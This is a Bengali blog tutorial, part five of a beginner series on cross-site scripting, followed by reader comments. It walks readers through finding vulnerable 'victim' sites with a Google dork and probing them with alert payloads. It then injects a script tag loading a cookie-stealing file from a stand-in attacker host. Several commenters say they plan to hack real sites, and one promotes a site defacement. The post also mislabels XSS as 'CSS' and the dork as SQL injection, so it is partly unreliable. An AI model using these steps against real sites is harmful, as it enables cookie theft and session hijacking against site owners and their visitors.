XSS এর সম্পূর্ণ টিউটোরিয়াল (নতুনদের জন্য) পর্ব- ৫

33
2487

আসসালামু আলাইকুম, সবাইকে আবারও ভ্রাম্যমান হ্যাকিং ক্লাসে স্বাগতম। প্রথমেই “অনির্বাচিত টিউনার” এর পক্ষ থেকে শরতের একরাশ নীল আকাশের একরাশ নীল, কুয়াশার হালকা আভাস  (পারলে আরও কিছু যোগ করুন। :P ) কেমন আছেন সবাই ? আশা করি সবাই পরিবার-পরিজন, আত্মীয়-স্বজন ও পাড়া-প্রতিবেশিদের নিয়ে খুবই ভাল আছেন। ভাল থাকুন ও ভাল রাখুন আপনার পাশের মানুষটিকে।

Don’t Learn To Hack … Just Hack To Learn

XSS এর সম্পূর্ণ টিউটোরিয়াল (নতুনদের জন্য) পর্ব- ৫

Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

আজ আবারও আপনাদের জন্য XSS নিয়ে টিউটোরিয়াল লিখতে বসলাম।  আগের টিউটোরিয়ালটি ছিল !i!i XSS এর একটি সম্পূর্ণ বাংলা হ্যাকিং টিউটোরিয়াল !i!i। কিন্তু অনেকেই বলেছে যে, তারা এই টিউটোরিয়ালটি থেকে ঠিক মতো বুঝেন নাই। তাই আমি আবারও এটি লিখতেছি। আশা করি আজকের টিউটোরিয়াল থেকে বুজতে পারবেন। তাহলে শুরু করা যাক টিউটোরিয়ালটি।

হ্যাকিং নিয়ে ধারাবাহিক পর্বগুলো দেখেনঃ

XSS কি ?

XSS হ্যাকিং সম্পর্কে জানতে হলে প্রথমেই জানতে হবে XSS জিনিসটা কি? Cross site Scripting এর সংক্ষিপ্তরূপই হচ্ছে XSS এটাকে আবার CSS(Cascading Style sheet) ও বলে থাকে। যার যেভাবে ইচ্ছা সে ভাবে বলে। এটা Web Application Vulnerability এর সবচেয়ে জনপ্রিয় গুলোর একটি। এই vulnerability একজন হ্যাকারকে একটি সাইটে client side scripts (বিশেষ কিছু Javascript) ইনসার্ট করার অনুমতি প্রদান করেন। এই vulnerabilityদিয়ে একজন হ্যাকার ভিকটিমের সাইটে malicious codes, malware attack, phishing ইত্যাদি inject করাতে পারে।

XSS Vulnerability and Injection

ধাপ ১: Vulnerable ওয়েব সাইট খুঁজে বের করা

একজন হ্যাকার প্রথমে Vulnerable সাইট খুজে বের করেন। এজন্য সে প্রথমে Google এ যায়। তারপর সে Google Dorks ব্যবহার করে Vulnerable সাইট খুজে বের করে। তাহলে আপনি তার সাথে সার্চ দিন নিচের sql Injection দিয়ে।

"search?q="

তাহলে আপনি অনেকগুলো Vulnerable সাইট খুজে পাবেন। এবার একটি সাইটে প্রবেশ করুন।

ধাপ ২: Vulnerability পরীক্ষা করা

এখন আমরা যে সাইটে প্রবেশ করেছি, সেই সাইটের Vulnerability পরীক্ষা করে দেখব। এজন্য আপনাকে প্রথমে উক্ত সাইটের এবটি পোষ্ট বা parameter খুঁজে বের করতে হবে। বুঝেছেন? না বুঝলে একটু অপেক্ষা করেন, বলছি। মানে আপনি এমন একটি পোষ্ট খুঁজে বের করবেন যা উক্ত সাইটের সার্ভার পাঠাবে। যেমনঃ search query, username, password.

Vulnerability পরীক্ষা করা জন্য দুটি পদ্ধতি আছে।

পদ্ধতি ১: প্রথম পদ্ধতি হল সাইটের মূল সার্চ বক্সে injection করা।

একজন হ্যাকার সাধারণত সাইটের মূল সার্চ বক্সে একটি malcious script লিখে, তারপর সার্চ বাটনে ক্লিক করে। সার্চ দেয়ার সাথে সাথে malcious script টি ওয়েবসাইটে কাজ করা শুরু করে দেয়।

undefined XSS এর সম্পূর্ণ টিউটোরিয়াল (নতুনদের জন্য) পর্ব- ৫
পদ্ধতি ২: সাইটের URL এ injection  করা।
এটি কোন সার্চ বক্সে কাজ করে না। এটি শুধু মাত্র সাইটের URL এ কাজ করে থাকে। যেমনঃ-
htp://vulnerablewebsite/search?q=malicious_script_goes_here
পরীক্ষা করার সুবিধার্থে  input fields হিসেবে নিচের কোডটি দিন।
<script>alert('hi');</script>
এবার উপরের কোডটি দিয়ে আপনি এবার পরীক্ষা করে দেখুন। যেমনঃ-
প্রথম পদ্ধতিঃ আপনি উপরের কোডটি আপনার ভিকটিমের সাইটের মূল সার্চ বক্সে লিখে সার্চ দেন।
দ্বিতীয় পদ্ধতিঃ আপনি ভিকটিমের সাইটের লিংকে লাগিয়ে এন্টার দিন। যেমনঃ-
http://vulnerablewebsite/search?q=<script>alert('TunerPage');</script>
এবার যদি ‘TunerPage’ লিখা একটি পপ আপ বক্স আসে। তাহলে বুঝবেন যে এই সাইটটি XSS এর জন্য vulnerable.

ধাপ ৩: Malicious Scripts দেয়া

Vulnerability পরীক্ষা করার পর একজন হ্যাকারের পরবর্তী কাজ হল, ভিকটিমের সাইটে malicious scripts ইঞ্জেকট করানো। এটি উক্তি সাইটের cookies চুরি করা এবং malware attack করতে সহযোগিতা করবে।

এখন মনে করুন হ্যাকারের সাইটে cookie stealing script টি আছে। তাহলে তার malicious script url হবে

http://attackerSite/malicious.js

এখন হ্যাকার তার malcious script টি vulnerable site এ inject  করতে পারবেন। তাহলে তার URL হবে

<script src=http://attackerSite/malicious.js></script>

এরপর যখনই উক্ত সাইটের ভিজিটর উক্ত সাইটে ভিজিট করবে, তখনি malcious script টি কাজ শুরু করে দিবে এবং কুকি চুরি করা শুরু করে দিবে।

সাধারণত XSS এর ক্ষমতা অনুসারে persisting capability হয় দুই ধরনের। একটা হল Persistent আরেকটা হল Non-Persistent

Persistent XSS:

এটা হল সবচেয়ে বেশি ঝুঁকিপূর্ণ XSS vulnerability. এটা সরাসরি সার্ভার থেকেই ডাটা সমূহ সংরক্ষণ করে থাকে। তাই আপনি যখনই উক্ত সাইটে malicious script injection দিবেন, সাথে সাথে এটি ওয়েব এ্যাপ্লিকেশানে স্থায়ীভাবে সংরক্ষণ হয়ে যাবে। এটি অন্যন্যা সকল ভিজিটরকে এটা দেখিয়ে দিবে।  যদি আপনি আপনার ভিকটিমের ওয়েব সাইটে malicious script injection করবেন, তাহলে এটি উক্ত সাইটে আসা ভিজিটরদেরও আক্রান্ত করে। যেমনঃ-  কিছু কিছু সাইট আছে, যারা তাদের সাইটের ব্যবহারকারিদের ট্যাক করার জন্য search query গুলো সংরক্ষণ করে রাখে। যার ফলাফল XSS এর permanent storage. :)

Non-Persistent XSS:

 একে অনেকেই Reflected XSS বলে থাকে। এজন্যই malicious script এখানে টেম্পরারী। ফলে আপনার দেয়া স্ক্রীপ্টটি সাধারণ ভিজিটররা দেখতে পারবে না। তবে হ্যাঁ, যারা হ্যাকার তারা তাদের দেয়া স্ক্রীপ্টটি ভিজিটরদের দেখানোর জন্য injection টিপস ব্যবহার করে থাকে। মজার বিষয় হল, যারা উক্ত সাইটের যারা নিয়মিত ভিজিটর তারা কিন্তু মনে করে যে এটা সাইটের নিজের লিংক। ফলে তারা সেখানে যায় আর তারও উক্ত সাইটের হ্যাকিংয়ের শিকার হয়। যেমনঃ-  আপনি কিছু কিছু সাইটে যে কোন জিনিস সার্চ দিলে দেখবেন আপনাদের আপনার দেয়া সার্চ স্ট্রিংটি আপনাকে পুনরায় দেখাচ্ছে। এটার কারণেই malicious code temporarily .

একজন হ্যাকার এই Vulnerability দিয়ে কি করে ?

  • পরিচয়পত্র ও বিভিন্ন গোপনীয় তথ্য চুরি করা।
  • ওয়েব সাই্টের Bypassing restriction
  • Session Hijacking
  • Malware Attack
  • Website Defacement
  • Dos attacks

আশা করি সবাই XSS এর বিষয়ে মোটামুটি ভাবে বুঝতে পেরেছেন। আরও কিছু টিউটোরিয়াল সামনে পাবেন। তখন আরও পরিষ্কার ভাবে শিখতে পারবেন XSS এর সম্পর্কে।

সবাইকে অনেক অনেক ধন্যবাদ, ভাল থাকুন ও ভাল রাখুন পাশের মানুষটিকে। আল্লাহ হাফেজ…….

 

টিউনারপেজের নতুন টিউন আপনাকে ইমেইল করব?
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

33 মন্তব্য

    • ছবি দিতে চেষ্টা করলাম তাও আসল না। :(
      পোস্টের জন্য ধন্যবাদ।

      • কিসের ছবি? আপনি ছবি দিতে চাইলে প্রথমে ড্যাসবোর্ডে যাবেন। তারপর “আপলোড” থেকে একটা ছবি আপলোড করবেন। এবার মন্তব্য দেয়ার বক্সের নিচের “মন্তব্যের সাথে যদি ছবি দিতে চান তাহলে এখানে ক্লিক করে ছবির লিংক দিন” এ ক্লিক করে ছবির লিংক দিয়ে মন্তব্য করে দিন। তাহলেই হয়ে যাবে। আপনাকেও ধন্যবাদ

  1. tx and তোমাকে না বললাম একটা site আর লিঙ্ক দিয়া পোস্ট korta ::দ তারপর ও বল hoica :::tx

  2. ভারতের জনপ্রিয় website hack হলো BCA এর সিস্যদের হাতে !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
    সাইটটি এখন হ্যাকার নিয়োগ দিচছে । যোগ্যতা: BCA-Hacker। আবোশ্যই Apply করবেন। লিনক গুলো দেখুন।
    http://www.mauryasoftware.com/ourprojects.aspx
    http://www.mauryasoftware.com/carrer.অস্প্ক্ষ

    আনিরবাচিত টিউনার ভাইকে উৎসরগো করে……………………

      • সাইটটা দেখলাম। পুরা বরবাদ করে দিসে। আর আমি তো হ্যাকারই না। কেউ এখন পর্যন্ত আমার হ্যাকিং করা কোন সাই্টই দেখাতে পারবে না, ইনশাআল্লাহ। আর আমি হ্যাকার হিসাবে কোথাও আবেদন করার কোন ইচ্ছাই নেই। আপনাকে অনেক ধন্যবাদ আমাকে উৎসাহ দেয়ার জন্য। :)

  3. দারুন! মনে হচ্ছে আমরা সত্যি hacker হতে চলেসি. এরকম পোস্ট daily আসা করসি আপনার কাস থেকে .
    ভারতের জনপ্রিয় website hack হলো BCA এর সিস্যদের হাতে !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
    সাইটটি এখন হ্যাকার নিয়োগ দিচছে । যোগ্যতা: BCA-Hacker। আবোশ্যই Apply করবেন। লিনক গুলো দেখুন।
    http://www.mauryasoftware.com/ourprojects.aspx
    http://www.mauryasoftware.com/carrer.অস্প্ক্ষ
    আনিরবাচিত টিউনার ভাইকে উৎসরগো করে……………………

  4. সব বুজলাম কিন্ত এখনো একটা sit এর প্রবলেম পেলাম না বের করতে
    darun http://www.thissite.com ar problem ame ke kora bar korboo atai ame akono buje nai. tar por bake kaz. tar por injection na ke oi gulo use korboo.
    অনেক ধন্যবাদ আপনাকে

    • আদি ভাই আপনাকে প্রথমে Vulnerable সাইট খুজে বের করতে হবে। আপনি যে সাইটের লিংক দিয়েছেন এটা হয়ত Vulnerable সাইট না। তাহলে আপনি কি এটা হ্যাকিং করতে পারবেন? আপনি আমার দেয়া গুগল ডক ব্যবহার করে চেষ্টা করে দেখুন। আশা করি পারবেন, ধন্যবাদ

    • পোষ্টের প্রথমে একটা লিংক দিসি, সেটা দেখেন। এই পোষ্টে আমি যতটুকু সম্ভব সহজ ও বিস্তারিত লেখার চেষ্টা করেছি। আপনি আমার হ্যাকিং নিয়ে টিউটোরিয়ালগুলো কষ্ট করে পড়েন। তাহলে আশা করি আরও বুঝতে পারবেন। ধন্যবাদ

  5. আবারও ফাটাইলেন। গ্রেনেড ফাটাইলেন। এইবার বিষয়টা ভালভাবে বুঝলাম।

  6. ওয়াও ! পাঙ্খা ! এইবার বুজতে পারছি :) দারান টিউনারপেজ এ এইটা দিয়া একবার হ্যাক করি আগে ;)

মন্তব্য দিন আপনার